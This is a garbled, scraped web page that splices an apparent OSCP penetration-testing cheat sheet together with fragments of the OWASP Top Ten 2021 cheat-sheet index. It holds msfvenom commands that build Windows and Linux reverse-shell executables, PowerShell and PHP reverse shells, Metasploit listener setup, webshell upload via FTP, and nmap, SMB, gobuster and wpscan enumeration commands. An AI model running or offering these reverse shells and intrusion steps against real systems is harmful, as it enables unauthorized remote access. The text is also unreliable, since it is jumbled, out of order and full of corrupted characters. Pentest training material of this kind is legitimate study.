Msfvenom -p windows/圆4/shell_reverse_tcp LHOST= LPORT= -f exe -o reverse.exe Msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe -o reverse.exe Msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell Msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell Metasploit System Binaries # Linux reverse shell - Staged Invoke-PowerShellTcp -Reverse -IPAddress -Port
#ONSIP CHEAT SHEET WINDOWS#
Netcat for Windows available here # PowerShellĬp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1 usr/share/webshells/php/php-reverse-shell PHP reverse shell available here or locally Msf(exploit/multi/handler)> set LHOST # or Msf(exploit/multi/handler)> set payload path/to/payload Shells / Payloads Universal Listeners # Netcat # Find mount points on the target where SUID programs and scripts can be run from # for ip in $(seq 1 254) do echo 10.11.1.$ip done > snmp-ips Smbclient //$ip/share -N -option='client min protocol=NT1' Smbclient -L \\$ip -N -option='client min protocol=NT1'
To check access type using smbclient, it’s best to access each share, read a file, and write a file. Note: smbmap will state access type available, smbclient will NOT. Msf>use auxiliary/scanner/smb/smb_version General enumeration nmap -Pn -n -p139,445 -script smb-* $ip WordPress, use API wpscan -url -e p,t,u -detection-mode aggressive > wpscan.logĭrupal, found here droopescan scan drupal -t 32 Gobuster dir -u -w /wordlist -o gobust_txt.out -x txt Gobuster dir -u -w /wordlist -o gobust_php.out -x php Gobuster dir -u -w /wordlist -o gobust.out
# Use CMS specific wordlist if one is found Scanning each sub-domain and interesting directory is a good idea # Use small common wordlist first View-Source of pages to find interesting comments, directories, technologies, web application being used, etc. Get web server, version, potential OS curl -i Use Wappalyzer to identify technologies, web server, OS, database server deployed Run this script with following wordlist /usr/share/metasploit-framework/data/wordlists/unix_users.txt Uploading a binary or webshell ftp> binaryĪdditional banner grabbing ssh 53 - DNS # Get nameservers and domain name of the IP address Nmap script scanning - will reveal anonymous access nmap -Pn -n -vvv -p21 -sC -sV $ipĬhecking anonymous access manually ftp ipĮasy view of FTP content - Browse to: ftp://$ip # All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
UDP Scanning sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ipĪutomated nmap scanning (my preference is nmapAutomator, never missed a port) # It is recommended to scan ONE IP at a time Targeted scanning nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip Scan all ports nmap -Pn -n -vvv -p-oN nmap/allports $ip If no ports are found, scan in parts nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip Initial scan nmap -Pn -n -vvv -oN nmap/initial $ip This mapping is based the OWASP Top Ten 2021 version.OSCP Cheatsheet General Enumeration - Nmap This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. It represents a broad consensus about the most critical security risks to web applications. The OWASP Top Ten is a standard awareness document for developers and web application security. OWASP Top Ten 2021 : Related Cheat Sheets ¶ Insecure Direct Object Reference Prevention
#ONSIP CHEAT SHEET SOFTWARE#
A06:2021 – Vulnerable and Outdated ComponentsĪ07:2021 – Identification and Authentication FailuresĪ08:2021 – Software and Data Integrity FailuresĪ09:2021 – Security Logging and Monitoring FailuresĪ10:2021 – Server-Side Request Forgery (SSRF)
0 kommentar(er)
